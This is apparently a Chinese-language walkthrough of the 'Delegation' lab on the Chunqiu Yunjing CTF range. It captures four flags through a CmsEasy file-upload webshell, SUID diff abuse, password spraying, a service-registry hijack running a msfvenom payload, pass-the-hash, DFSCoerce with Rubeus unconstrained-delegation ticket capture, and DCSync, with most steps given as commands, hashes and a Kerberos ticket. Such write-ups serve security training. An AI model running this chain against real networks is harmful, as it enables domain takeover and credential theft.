渗透
春秋云镜-Delegation
flag01
webshell
1 | start infoscan |
开放了四个端口,80是一个CmsEasy
查看源代码发现版本:CmsEasy 7_7_5_20210919
/admin 使用弱口令admin/123456登录后台。在网上找到任意文件上传POC
这是yakit的模板
1 | POST /index.php?case=template&act=save&admin_dir=admin&site=default |
执行后在web根目录生成1.php
root
1 | find / -perm -u=s -type f 2>/dev/null |
发现diff命令具体suid权限
查一下diff文件的用法:diff | GTFOBins
find命令发现flag位置
1 | diff --line-format=%L /dev/null /home/f*/f* |
flag01: flag{f32fec29-297c-43a5-a5b4-52ae00b09a16}
flag02
内网收集
flag01中提到了 WIN19\Adrian,很明显是一个域用户
我们先搭代理,然后扫一下内网
1 | ./fscan -h 172.22.4.36/24 |
简单归纳一下
172.22.4.7 DC域控
172.22.4.19 FILESERVER.xiaorang.lab
172.22.4.36 外网(已拿下
172.22.4.45 XIAORANG\WIN19
而且有提到rockyou,我们使用rockyou作为密码字典来对172.22.4.45进行密码喷洒
1 | proxychains crackmapexec smb 172.22.4.45 -u 'Adrian' -p rockyou.txt -d WIN19 |
拿到密码babaygirl1,但是密码过期了
system
我们直接rdp上去改密码
1 | proxychains4 rdesktop 172.22.4.45 -u 'Adrian' -p 'babygirl1' -z -r disk:share=/root/tmp |
登录上去之后发现桌面有个东西
文件夹里面有个html,打开发现是份安全报告。点开发现里面有两个high的风险。
这里提到了当前用户可以修改这个注册表。
那我们把这个目标exe改成木马不就直接拿到system了吗?
生成一个C2马
在cmd运行
修改注册表
1 | reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\testx64.exe" /f |
查看是否成功
1 | reg query "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /v ImagePath |
启动服务
1 | sc start gupdate |
但是CS的马一直连不上,后来换成msf成功
先生成木马
1 | msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe > aaa.exe |
启动msf
1 | proxychains msfconsole |
但是session的存活时间很短,需要迁移一下进程(选system权限的进程迁移
1 | migrate 5676 |
1 | cat /users/administrator/flag/flag02.txt |
flag02: flag{2e435492-d4d1-492f-b066-7ca7679f36f3}
flag03
把哈希dump下来
1 | meterpreter > hashdump |
但是没什么用
加一个管理员账号,方便rdp(msf的shell进不去,打一个pth来加用户
1 | proxychains4 python psexec.py administrator@172.22.4.45 -hashes "aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab" -codec gbk |
加账号
1 | net user fffffilm Password@973 /add |
然后再抓一下哈希
1 | meterpreter > load kiwi |
1 | Username Domain NTLM SHA1 |
用bloodhood进行信息收集
1 | ┌──(root㉿kali)-[~/Desktop/tools/BloodHound-python] |
分析发现win19和dc都有非约束性委派权限(域控是默认配置了的
所以可以利用非约束性委派,只要域控访问了win19,就可以获取TGT,然后导入票据,最后dump哈希
用刚刚加的管理员rdp上去
1 | proxychains4 rdesktop 172.22.4.45 -u 'fffffilm' -p 'Password@973' -r disk:share=/root/tmp |
先监听(需要管理员运行
1 | .\Rubeus.exe monitor /interval:1 /filteruser:dc01$ |
然后进行强制认证奇安信攻防社区-红队域渗透NTLM Relay:强制认证方式总结
1 | proxychains4 python dfscoerce.py -u "WIN19$" -hashes :5943c35371c96f19bda7b8e67d041727 -d xiaorang.lab WIN19 172.22.4.7 |
拿到TGT后导入TGT票据
1 | .\Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD5kqHiyeguCbUjWyXJxzwONdCB5iDsgmpTWOIxHgHHmb4WIrIXkiT6/wp8IC9d7IFI2Q+Ol8aE7dXNPFc3NgFCznxPFDUpF7Tz/ILtcVg5h1f/ShYgTjhZ4RINrJXU2sCELveNASbDnqixuOPajRclKCdCYwlv03LjH3JwlFYKD3UlxxBn6eRwewzuHzQRlaCrh9HoM4rqaT3xj5/xz2tCpLK6oEf6OFa22+67pQjrvZ9ZPgnE2Vq+DzyYkDn8Ufg190rNnfjGFJq1AtgjB3DgQItqLRP17RpGuOtJdrWhFeBhVyZH/4ANqH8nv+5jgbZWoPXqVMlMM2dNE1zQjymIDuNPNj051IdpyCD1NcMkDIKoPYXLpwZy3Ktwo1ZlKHJdlOg2WS+WgcwbzIUMxSLCXOAOxRLIq91vw7+trJJ4p+nlCspUhBFLJ3a0BFKF5+KEJqAFsn++j9NhSzsLgaK2it2v51AaE+SbRtrAND2RxDH/3mFHpa582nqUrpmCOPWrpgj7gkMeqnBPPRU2ki9y0cQPfS8DUaueQdokVZjZmlhwLs+iKtdWamykRBstI0APqjSLuUzV993iPhZhw+V4W/KkPmIQuXDX8+sRcVwX5xisIPAerRjBSJZHE41+wYMvpl/KtukbjRwSPnMQgeH1LsY5DlLx1LjgwukEKU2wBwQcAR13GAoARr3+iUfJywg+oxaiFd512HR6J4R91VL8gL9SJ50zP5D9UXgWDlU7dnLZVgsU/mlR2eBPpvpYcAhL+TgBJuArlJ9K3FVrf3hAOZV2wX0NzG2Q2hl6hoovUEwgz5+srGRAv+fnesXUGjhD9+h4CwijC/BgBBNw+1DdSNNnMjxFFA2lHEd9tmsa1hhvCvoNlC6tk5PPWEAhVCfwZDpy8HKKZA9A2bdo1OaoKHN9ejBrGgs7J87eW42iIJ8Hh1cbEXmCA2/WX8Lv6ZQ/Zl6kZXipntdhGNqT9yFiP6RLWcciQvyMwkfZFwCSv+H4pj/ACCL/ABoeBhBSCKfbSYUsSJqVRHYQAphb9cN4D8ZrIrF8pJIgcNQWmewYrQk2mqvYtoxtfz24TzckKVDmgdXSRHgoht3I9oJKNfdXV4juIR16VPc3JY4LqadBTTBO/egt+1oRamBi55ndLUV+0XBOS5hHkxyAfG1ItmrfB2EeRgFlpSOiPCdKyrikbeBXlQDAcK7xOrLZSUAeNjzet9BqVthKVovMpUCfReYcOkTChz3uxCqlBBxosPXI8PoEPa7V+9Z7TNGnk3DVTq7/iQvZpLf3CJk4FFc88BD1IGM0rL9ek/WbAXTXZOYfGg5nuBYKOnW/xFHr6VOf+MZd5PJOqLNHVt/Iu2MAxMSoTBM6vu/W8zcyEq+kfdRqwemAUH+hLN4cBOy4JqXa+VIS+xIMikmw2sUTEmBdn2KAk1qf4hdNgwuaJShJFSWmjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCAuT2BlZ/N6dP9EejdLabb7WrlFnPLpXAk7VtCJ3j6ga6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIyODA5NTUwMlqmERgPMjAyNTAyMjgxOTU1MDJapxEYDzIwMjUwMzA3MDk1NTAyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg== |
打开mimikatz然后用dcsync拿hash
1 | lsadump::dcsync /all /csv |
最后打个pth拿flag
1 | proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt" |
flag03: flag{608368ba-4efc-493b-914e-8e67eac324cb}
flag04
1 | proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt" |
flag04: flag{25d59671-4d7d-4b8c-8927-bca843c1a12c}